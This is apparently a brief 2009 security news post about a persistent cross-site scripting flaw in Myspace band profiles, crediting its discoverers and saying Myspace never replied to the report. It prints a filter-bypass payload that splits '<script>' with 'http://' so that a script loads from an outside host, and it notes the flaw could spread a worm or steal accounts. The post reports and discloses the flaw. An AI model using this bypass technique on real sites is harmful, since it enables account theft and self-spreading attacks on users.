Myspace.com hit by a Permanent XSS
Written by KF
Wednesday, 28 January 2009
Note 02/02/09: TrainReq (Josh Holly) reportedly discovered first the vulnerability, in the film profiles.
Daniel Lo Nigro has discovered a trick to bypass the Myspace filters and insert a script on a Myspace band profile. Myspace prevents <script> from behing written in a band website URL but strips out "http://" from it, it can therefore be exploited this way:
URL: test.com?<scrihttp://pt src=//site.com/xss.js>
Or have a look at Daniel's harmless example:
Daniel says he alerted Myspace but that they never answered him.
Here is the mirror of the XSS:
This XSS could be exploited to spread a worm, steal myspace accounts..
In the past Myspace was hit by a number of security issues, including the "Samy" XSS worm.